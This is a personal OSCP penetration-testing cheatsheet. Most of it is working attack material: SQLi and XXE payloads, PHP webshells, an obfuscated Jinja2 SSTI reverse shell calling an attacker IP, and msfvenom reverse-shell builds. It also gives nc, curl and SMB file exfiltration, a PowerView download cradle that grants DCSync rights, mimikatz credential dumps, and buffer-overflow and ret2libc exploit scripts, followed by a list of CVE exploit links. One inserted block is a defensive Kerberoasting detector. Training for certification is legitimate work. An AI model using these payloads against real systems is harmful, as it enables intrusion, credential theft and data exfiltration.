{%hackmd theme-dark %}

# OSCP Cheatsheet: MOTHER OF ALL OMELETTES

can't fret over every single egg

For the report template, refer to the CPTC examples or the given ones:

- CPTC: https://github.com/nationalcptc/report_examples
- Other given thing: https://github.com/whoisflynn/OSCP-Exam-Report-Template

## Foothold

### Web

Always bruteforce directories in the background and manually search the websites as you brute. If it seems like a custom application or is empty, do a quick inspect-element check on the pages. Check POST requests in Burp, and pay attention to cookies and parameters.

- Subdomains via Host header fuzzing: `ffuf -u <http/https> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.domain" -fw <word count of false positives>`
  - https://null-byte.wonderhowto.com/how-to/fuzz-parameters-directories-more-with-ffuf-0330806/
- `gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://website:port -t threads -x .php,.txt,.etc`
- Found a domain name? Vhosts: `gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u worker.htb`
- `wpscan --url <url> --disable-tls-checks --api-token <token>`
- Brute force with Hydra: `hydra boxIP -s PORTNUM http-post-form -l username -P /path/wordlist '/url/from/webroot:log=James&pwd=^PASS^&other_post_parameters:F=message when login fails'`
- SQLi test: `admin' or 1=1;#` or just a `'`
- Test IDOR if parameters or directories allow it (`?id=0` or `/users/0`, that type of thing)

### LFI / RFI

- Point it at another php page, a page restricted to localhost, or your own hosted php (Ivan). Brute force all php methods if necessary.
- `?page=php://filter/convert.base64-encode/resource=../../../something.php`
- `exec, passthru, system, shell_exec`
- PHP log poisoning: try to include `/var/log/apache2/access.log` or `/var/log/auth.log` (for ssh, or the respective log for vsftpd)
- `/var/log/nginx/error.log`, `/var/log/nginx/access.log`

### File upload

- If the upload is on aspx or asp, try those files, or a .config (https://0xdf.gitlab.io/2018/10/27/htb-bounty.html#webconfig-rce) or a .master (butch.md)
- Common php webshell: Ivan or `<?php system($_GET['cmd']);?>`
- Image magic bytes (note: these are the PNG signature plus the IHDR chunk header, not JPEG; fine when only the magic bytes are checked): `echo -ne '\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0d\x49\x48\x44\x52' > shit.php.jpg`

### SQLI Payloads

- First, confirm SQLi with `' or 1=1;--` (if that bypasses login or crashes something), or something like `1+1` which resolves to 2.
- If output is reflected, try union injection.
- `' UNION SELECT 1,1,1;--` replaces all columns with 1's. May need to adjust the number of 1's accordingly.
- After getting the needed column count, enumerate the db: `' UNION SELECT 1, group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database();-- `. The column count has to match what you found above (the example has group_concat plus the numbered placeholders 1-7), and the reflected output may be within the first/second/etc. column, so adjust where group_concat sits accordingly.
- Other stuff: `group_concat(column_name) ... from information_schema.columns where table_schema=database()`
- `group_concat(password) from mysql.user`

### Wordpress Stuff

- `/wp-content/plugins/akismet/akismet.php`. If we're authenticated, try modifying this plugin with Ivan.
- Alternatively, modify an existing theme and go to the path of that page: `/wp-content/themes/themename/404.php`

### API stuff

honestly APIs are tough as hell (cptc flashbacks)

- Try to see what methods the endpoints accept: `curl -X OPTIONS http://bruh:5000`
- Fuzz the parameters being passed

### XXE

```xml
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<element>&xxe;</element>
```

### SSTI

Jinja2

- Test with `{{ 7*7 }}`, see if it returns 49 (Jinja2)
- WAF-avoiding payload that does a nc revshell. Adjust accordingly:

```
{% include request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10\x2e10\x2e16\x2e6 4444 >/tmp/f")|attr("read")() %}
```

### Tomcat

- Upload a war, then access it at /shell.war
- Reverse proxy path traversal: `http://10.10.11.138/bruh/..;/manager/html`

### Reverse Shell Payloads

https://www.revshells.com

- Encoded: `echo -e "<base64encoded revshell cmd>" | base64 -d | bash`
- Note the python ones, they're pipe-less and angle-bracket-less (some RCE service exploits might not work with `|`s and `>` or `<`)
- Msfvenom
  - Linux: `msfvenom -p linux/x86_or_x64/shell_reverse_tcp LPORT=PORT LHOST=HOST -f elf -o shell.elf` (`-f elf-so -o shell.so` for a shared object)
  - Windows x64: `msfvenom -p windows/x64/shell_reverse_tcp LPORT=PORT LHOST=HOST -f exe -o shell.exe` (`-f dll -o shell.dll` for a DLL)
  - x86: `msfvenom -a x86 -p windows/shell_reverse_tcp LPORT=PORT LHOST=HOST -f exe -o shell.exe` (or `-f dll -o shell.dll`)
  - Shellcode: `msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00\xOtherBadStuff" -f c`
  - `msfvenom -p windows/exec CMD="blah" -f python -b "\bad"`

## Privilege Escalation

- `strings` and `file` any funky data file
- pspy to monitor processes (especially helpful for sneaky cronjobs)

### Linux Enumeration

https://gtfobins.github.io

- SUIDs: `find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l --color {} \; 2> /dev/null`
- Find keywords in directories: `grep -Ri "text" /path/ 2>/dev/null`
- Ports/Services: `netstat -tulpn`
- If `SETENV` on sudo, `sudo LD_PRELOAD=/tmp/shell.so command`
- `getcap -r / 2>/dev/null`, GTFObins if anything interesting
- Run linpeas

### Linux Exfiltration

- `cat file | nc kali port`
  - On Kali: `nc -nvlp port > file`. Vice versa for importing files to the victim
- `wget http://kali_ip:port/file` or `curl http://kali_ip:port/file > file`
  - On Kali: `python3 -m http.server`. Vice versa for importing files to the victim
- If you don't have nc or other ways to transfer stuff, python3 putserv (a SimpleHTTPRequestHandler with a PUT method that writes the body to disk):

```python
import argparse
import http.server
import os


class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    """Serve files as usual, and accept PUT uploads into the served directory."""

    def do_PUT(self):
        path = self.translate_path(self.path)
        if path.endswith('/'):
            self.send_response(405, "Method Not Allowed")
            self.end_headers()
            self.wfile.write("PUT not allowed on a directory\n".encode())
            return
        # create intermediate directories for nested upload paths
        os.makedirs(os.path.dirname(path), exist_ok=True)
        length = int(self.headers['Content-Length'])
        with open(path, 'wb') as f:
            f.write(self.rfile.read(length))
        self.send_response(201, "Created")
        self.end_headers()  # flush the status line so curl gets a reply


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--bind', '-b', default='0.0.0.0', metavar='ADDRESS',
                        help='Specify alternate bind address [default: all interfaces]')
    parser.add_argument('port', action='store', default=8000, type=int, nargs='?',
                        help='Specify alternate port [default: 8000]')
    args = parser.parse_args()
    http.server.test(HandlerClass=HTTPRequestHandler, port=args.port, bind=args.bind)
```

- Then `curl http://kali:port --upload-file file` (if Windows has curl, this works too)

### Windows Enumeration

- Run winPEAS
- `systeminfo`, then find the relevant exploit for the build number
- `whoami /all`
- SeBackup & SeRestore: https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
- SeRestore: https://github.com/xct/SeRestoreAbuse
- SeImpersonate (Server 2016 and before): JuicyPotato `Juicy.Potato.exe -l 4445 -p shell.exe -t * -c clsid`, CLSIDs at http://ohpe.it/juicy-potato/CLSID/
  - Server 2019+, RoguePotato: https://github.com/antonioCoco/RoguePotato
  - Server 2003: https://github.com/Re4son/Churrasco/blob/master/churrasco.exe
- SeLoadDriver: https://github.com/ma7amd/SeLoadDriverPrivilege (refer to a Fuse HTB writeup)
  - `.\EOPLOADDRIVER.EXE System\CurrentControlSet\MyService C:\Temp\Capcom.sys`

### Windows Exfiltration

`C:\Windows\Temp` is a safe directory. Or try to make a `C:\temp`.

- `C:\Windows\System32\curl.exe http://kali_ip:port/file > file`
- `certutil.exe -urlcache -f http://link file`
- `copy \\kali_ip\share_name\file file`
  - to exfiltrate: `copy file \\kali_ip\share_name\file`
  - on Kali, `smbserver.py share .`; add `-smb2support` if necessary
  - If that's being funky, try `net use X: \\kali_ip\share`, then `copy file X:\file`

## Active Directory

### AD Enumeration

https://wadcoms.github.io

- Kerberoasting: `GetUserSPNs.py -request -dc-ip active.htb active.htb/SVC_TGS -outputfile hashes`
  - run `ntpdate` a few times if it doesn't work (clock skew)
  - on the host, `Rubeus.exe kerberoast`
- `enum4linux 10.10.10.10`, or the python alternative https://github.com/cddmp/enum4linux-ng
- `kerbrute userenum -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.161`
- ASREPRoasting: `GetNPUsers.py htb.local/santi -usersfile userlist -dc-ip 10.10.10.161`
- Valid creds: `bloodhound-python -u 'svc-alfresco' -p 's3rvice' -ns 10.10.10.161 -d htb.local -c all`, or run SharpHound on the host.
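The other side of the Kerberoasting and ASREPRoasting commands above, as an added example that is not part of this cheatsheet: a small Python detector over Windows Security event records, the way a SIEM rule would see `GetUserSPNs.py -request` or `GetNPUsers.py`. The field names mirror the event XML for 4769 (TGS request) and 4768 (TGT request); the sample events, the threshold of five RC4 service tickets and the five-minute window are assumptions chosen for the example.

```python
"""Flag Kerberoasting and AS-REP roasting from Windows Security events.

Added example, not part of the cheatsheet. Runs over constructed records
shaped like the fields a SIEM extracts from events 4769 and 4768:
TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, IpAddress.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # TicketEncryptionType for RC4-HMAC (etype 23), what roasting tools request
NO_PREAUTH = "0"               # PreAuthType 0: AS-REQ accepted without pre-authentication
MIN_SERVICES = 5               # distinct SPN accounts one user requested inside WINDOW (assumed threshold)
WINDOW = timedelta(minutes=5)  # assumed window


def _ts(ev):
    return datetime.fromisoformat(ev["Time"])


def _is_user_spn(name):
    # computer accounts (DC01$) and krbtgt receive TGS requests constantly; roasting goes after user SPNs
    return not name.endswith("$") and name.lower() != "krbtgt"


def kerberoast_candidates(events, min_services=MIN_SERVICES, window=WINDOW):
    """{requesting user: sorted service names} for users that pulled RC4 service
    tickets for at least `min_services` distinct SPN accounts within `window`."""
    by_user = defaultdict(list)
    for ev in events:
        if (ev.get("EventID") == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC
                and _is_user_spn(ev["ServiceName"])):
            by_user[ev["TargetUserName"]].append(ev)
    hits = {}
    for user, evs in by_user.items():
        evs.sort(key=_ts)
        for start in range(len(evs)):          # sliding window anchored at each request
            services = set()
            for ev in evs[start:]:
                if _ts(ev) - _ts(evs[start]) > window:
                    break
                services.add(ev["ServiceName"])
            if len(services) >= min_services:
                hits[user] = sorted(services)
                break
    return hits


def asrep_roast_candidates(events):
    """{account: source ip} for TGT requests that succeeded without pre-authentication,
    which is what GetNPUsers.py produces for accounts with pre-auth disabled."""
    return {ev["TargetUserName"]: ev["IpAddress"]
            for ev in events
            if ev.get("EventID") == 4768 and ev.get("PreAuthType") == NO_PREAUTH}


# Constructed sample telemetry (not real log data).
EVENTS = [
    {"EventID": 4769, "Time": "2024-01-10T09:00:00", "TargetUserName": "alice@HTB.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
    *[{"EventID": 4769, "Time": "2024-01-10T09:01:%02d" % i, "TargetUserName": "svc-alfresco@HTB.LOCAL",
       "ServiceName": svc, "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.20"}
      for i, svc in enumerate(["SVC_TGS", "sqlsvc", "httpsvc", "mssql01", "backupsvc", "iissvc"])],
    {"EventID": 4768, "Time": "2024-01-10T09:02:00", "TargetUserName": "santi",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.20"},
    {"EventID": 4768, "Time": "2024-01-10T09:03:00", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
]

if __name__ == "__main__":
    for user, services in kerberoast_candidates(EVENTS).items():
        print("possible Kerberoast by %s: %s" % (user, ", ".join(services)))
    for account, ip in asrep_roast_candidates(EVENTS).items():
        print("AS-REP without pre-auth for %s from %s" % (account, ip))
```

The RC4 filter is what makes this rule cheap: a domain that has moved its service accounts to AES keys sees almost no 0x17 service tickets, so a burst of them from one user for several SPNs stands out. Tune `MIN_SERVICES` to the environment, and excluding computer accounts is what keeps ordinary CIFS/HOST traffic out of the hit list.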
### Bloodhound Nodes or Groups

- `Exchange Windows Permissions` ==> give DCSync rights to self (exit and re-enter winrm to refresh)

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.16.2:8000/PowerView.ps1')
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\svc-alfresco', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=htb,DC=local' -Rights DCSync -PrincipalIdentity svc-alfresco -Verbose -Domain htb.local
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembers -PrincipalIdentity svc-alfresco
```

- DNSAdmins ==> control DNS, dll hijack
  - `dnscmd RESOLUTE.MEGABANK.LOCAL /config /serverlevelplugindll \\10.10.16.6\share\bruh.dll && dnscmd RESOLUTE.MEGABANK.LOCAL /Restart`
- Backup Operators ==> SeRestore and SeBackup

### AD Looting

- Remote DCSync: `secretsdump.py -just-dc <user>:<password>@<ipaddress>`
- `mimikatz.exe "sekurlsa::logonpasswords" "exit" > sek.txt`
- `mimikatz.exe "lsadump::sam" "exit" > sam.txt`
- If not SYSTEM, may have to preface these with `"privilege::debug"` and `"token::elevate"`
- If you get a Key Import error, try this older version: https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip

## Down Bad

- Custom wordlist: `cewl http://10.10.10.191/ -d 4 --with-numbers > cewlpasswords` (`-d` is the spider depth; `-m` sets the minimum word length)
- Scan UDP ports
- `--script=vuln` in nmap

## Pivoting

My preferred tools are SSH and Chisel (https://github.com/jpillora/chisel/releases/tag/v1.7.7)

### Port to Port

- Local forward with SSH: `ssh -L localport:host:hostport user@bruh` - traffic sent to your localport goes to host:hostport as seen from bruh
- Reverse forward with SSH: `ssh -R localport:host:hostport user@bruh` - opens localport on bruh and sends that traffic to host:hostport as seen from your side
- Reverse forward with Chisel: first set up the chisel server: `chisel server --port 8000 --reverse` (`--reverse` is what allows clients to request `R:` forwards).
  You probably want to do this on a machine that can hit both you and the internal hosts.
  - `chisel client serverIP:serverPort R:serverListenerPort:ipToForwardTo:portToForwardTo`

### Socks/Dynamic Forwards

Make sure you edit your proxychains configuration to use the correct port.

- SSH: `ssh -D 1080 user@bruh`
- Chisel (make sure you already have your server set up): `chisel client serverIP:serverPort R:1080:socks`

## Windows Remote BOF

### 1. Find the overflow

We can use the following Python3 script to see if something is crashable:

```python
#!/usr/bin/python3
import socket, time, sys

ip = "10.10.89.36"  # CHANGE THIS
port = 1337  # CHANGE THIS
timeout = 5
prefix = "OVERFLOW4 "  # if necessary

string = prefix + "A" * 100

# keep sending 100 more bytes each round until the service stops answering
while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)
    except:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)
```

After this we generate a pattern and then modify our script to utilize it.

```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q [the 8 hex digit EIP value from the crash]
```

Use this python3 script to overflow and find the EIP value to pass to the above command:

```python
#!/usr/bin/python3
import socket, time, sys

ip = "10.10.229.28"
port = 1337
timeout = 5
prefix = "OVERFLOW10 "  # if necessary

string = ""  # paste that long pattern from above here
string = prefix + string

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(timeout)
    s.connect((ip, port))
    s.recv(1024)
    s.send(bytes(string, "latin-1"))
    s.recv(1024)
```

### 2. Find the bad characters

```python
#!/bin/python3
# print every byte value 0x01-0xff as a \x escape, on one line
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
```

Output:

```
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
```

Utilize the Python script below to test bad characters. Jump to the ebx to check. The order of stuff goes like 01 02 03 etc. If there is something funky like 01 02 03 A0, then 04 (\x04) is a bad character.

```python
#!/usr/bin/python2
import socket

offset = 1978  # CHANGE THIS
overflow = "A" * offset
bad = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
prefix = "OVERFLOW1 "  # CHANGE THIS
payload = prefix + bad + overflow

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.89.36", 1337))  # CHANGE THIS
s.send(payload)
print(len(payload))
```

### 3. Find the JMP that lacks the bad characters

`!mona jmp -r esp -cpb "\x00\others"`

### 4. Format the payload (check below).
```python
#!/usr/bin/python2
import socket

offset = 340  # CHANGE THIS
prefix = b"OVERFLOW 6"  # if necessary
overflow = prefix + b"A" * offset
retn = b"\x03\x15\x10\x41"  # JMP ESP, little-endian
padding = b"\x90" * 20

# msfvenom -p windows/exec CMD="blah" -f python -b "\bad"
# or
# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00\xOtherBadStuff" -f py
buf = b""
buf += b""  # paste the msfvenom buf lines here

payload = overflow + retn + padding + buf + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.210.129", 7138))
s.send(payload)
print(len(payload))
```

### Extra Notes and Things

- Avoid DLLs with ASLR and SEH when looking for the JMP ESP.
- Run `!mona modules` to list the loaded DLLs. It shows which DLLs are safe, but a safe DLL might not contain a JMP ESP.

## Linux x32 Local BOF via ret2libc

### 1. Overflow the binary

Hopefully you're using gdb-peda. Also, to ensure ASLR is disabled, on the machine with the binary, run `ldd` on it a few times to see if the memory addresses change.

```
gdb ./binary
gdb-peda$ pattern create 200
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
gdb-peda$ run [above]
```

### 2. Find the offset and check the output

After reading the output (assuming it crashed, there should be a lot of it, and EIP will be overwritten with some arbitrary 4-letter string):

`gdb-peda$ pattern offset [4 letters from output]`

### 3. Find the libc addresses

Make sure you run these commands on the victim machine, since memory addresses may differ between hosts and our machine.

```
ldd binary | grep lib
libc.so.6 => /lib32/libc.so.6 (0xf7dc0000)
strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18f924 /bin/sh
readelf -s /lib32/libc.so.6 | grep system
1561: 00045120 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
readelf -s /lib32/libc.so.6 | grep exit
152: 00037ab0 33 FUNC GLOBAL DEFAULT 14 exit@@GLIBC_2.0
```

Now we know where libc is. We also know the offsets of the things we need within libc (the /bin/sh string, system, and exit). Add the libc base to each offset to get the full address to reference in our payload. Example below (the offsets are the ones from the readelf/strings output above):

```
Address we want = libc base + the method offset, then converted to little endian. You can use python to add these.
SYSTEM ADDRESS: 0xf7dc0000 + 0x00045120 = 0xf7e05120 = \x20\x51\xe0\xf7
EXIT ADDRESS:   0xf7dc0000 + 0x00037ab0 = 0xf7df7ab0 = \xb0\x7a\xdf\xf7
BINSH ADDRESS:  0xf7dc0000 + 0x0018f924 = 0xf7f4f924 = \x24\xf9\xf4\xf7
```

### 4. Payload

```
./overflow $(python2 -c 'print "\x90" * 112 + "\x20\x51\xe0\xf7\xb0\x7a\xdf\xf7\x24\xf9\xf4\xf7"')
```

Note the order matters because of how the call frame is laid out on the stack: the return address sits right after the function address, followed by the function's first argument. Payload order is: overflow + system addr + return addr (probably exit) + arguments (/bin/sh). Also please use python2 for this.

Some scripts below for automating this against ASLR, or just to not type it all in:

```python
#!/usr/bin/python2
import os
import struct

libraryAddr = 0xb7e19000
binshAddr = 0x0015ba0b
systemAddr = 0x0003ada0
exitAddr = 0x0002e9d0

# libc base + offset, packed as a 32-bit little-endian address
binshAddr = struct.pack('<I', libraryAddr + binshAddr)
systemAddr = struct.pack('<I', libraryAddr + systemAddr)
exitAddr = struct.pack('<I', libraryAddr + exitAddr)

buffer = 'A' * 52
buffer += systemAddr
buffer += exitAddr
buffer += binshAddr

print(buffer)
os.system('/home/ayush/.binary/rop' + " " + buffer)
```

And the ASLR one (hopefully it barely changes the address, else this takes years):

```python
#!/usr/bin/python2
import struct
from subprocess import call

base = 0xb7622000
syst = 0x00040310
exit = 0x00033260
binsh = 0x00162bac

syst_final = struct.pack("<I", base + syst)
exit_final = struct.pack("<I", base + exit)
binsh_final = struct.pack("<I", base + binsh)

buf = "A" * 112
buf += syst_final
buf += exit_final
buf += binsh_final

# keep running the binary until the randomised libc base lands on the guessed one
i = 0
while i < 50:
    print "Try: %s" % i
    print buf
    i += 1
    ret = call(["/usr/local/bin/ovrflw", buf])
```

# EXPLOIT LOG

This is probably like 90% of the CVEs, Microsoft security stuff, ExploitDB, and GitHub stuff that I found from HTB, PG, etc.
It's a lot.

## General Web Services

- ColdFusion Adobe Directory Traversal https://www.exploit-db.com/exploits/14641
  - https://pentest.tonyng.net/attacking-adobe-coldfusion/
- Bludit CMS <= 3.9.2 https://github.com/hg8/CVE-2019-16113-PoC
- Gym Management System 1.0 RCE https://www.exploit-db.com/exploits/48506
- Tomcat: manager war upload `msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f war > shell.war`, then access from `/shell.war`
  - default creds `tomcat:tomcat` or `tomcat:s3cret`, something along those lines
- PHP 8.1-dev: https://www.exploit-db.com/exploits/49933
- Voting System Using PHP CMS https://www.exploit-db.com/exploits/49846
- Open Net Admin 18.1.1 RCE https://github.com/amriunix/ona-rce/blob/master/ona-rce.py
- Magento 1.9 SQLi https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
- Magento authenticated RCE https://www.exploit-db.com/exploits/37811
- Nostromo 1.9.6 RCE https://www.exploit-db.com/exploits/47837
- SSL < 1.0.1: Heartbleed https://www.exploit-db.com/exploits/32745/
- WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion https://www.exploit-db.com/exploits/44544
- Cacti 1.2.12 SQLi to RCE https://www.exploit-db.com/exploits/49810
- Apache OFBiz 17.12.01 RCE https://www.exploit-db.com/exploits/50178
- DrupalGeddon2 https://www.exploit-db.com/exploits/44449
  - https://github.com/pimps/CVE-2018-7600
- DrupalGeddon1 https://www.exploit-db.com/exploits/41564
- Authenticated RCE phpMyAdmin 4.8 https://www.exploit-db.com/exploits/50457
- October CMS 1.0.412 upload bypass https://www.exploit-db.com/exploits/41936
- CuteNews 1.2.12 RCE https://www.exploit-db.com/exploits/48800
- WordPress Plugin Gwolle Guestbook 1.5.3 RFI https://www.exploit-db.com/exploits/38861
- WordPress Duplicator 1.3.26 file read https://www.exploit-db.com/exploits/50420

## Linux

- Screen SUID allows you to reattach to a session if it exists: `screen -x root/root`
- Screen 4.5.0 SUID https://www.exploit-db.com/exploits/41154
- Sudo <= 1.8.27, with `!ALL` ==> `sudo -u#-1 command`
- Authenticated to Splunk: https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- Unreal IRCd 3.2.8.1 backdoor shell https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor
- distcc < 3.1 (port 3632), CVE-2004-2687: https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
- Samba 3.0.0 through 3.0.25rc3: CVE-2007-2447 ==> https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py
- Redis unauthenticated ssh key overwrite https://github.com/iw00tr00t/Redis-Server-Exploit
  - Or rogue server for command execution https://github.com/n0b0dyCN/redis-rogue-server
- pfSense < 2.1.4 authenticated RCE https://www.exploit-db.com/exploits/43560
- Shellshock https://www.exploit-db.com/exploits/34900 (if you find a valid /cgi-bin/*.sh or related script, insert it here)
- Apache James Server 2.3.2 RCE when logged in: https://www.exploit-db.com/exploits/35513 (default root:root)

## Windows

- EternalBlue MS17-010: https://github.com/worawit/MS17-010
  - Checker (modify creds if necessary) ==> send_and_execute
- IIS 6: https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell <== doesn't always work
- `C:\Program Files (x86)\mRemoteNG` stores passwords in `C:\Users\<user>\AppData\Roaming\mRemoteNG`
  - https://github.com/haseebT/mRemoteNG-Decrypt `python3 mremoteng_decrypt.py -s <pass>`
- Look for a `Groups.xml` in SMB shares if possible, then `gpp-decrypt`
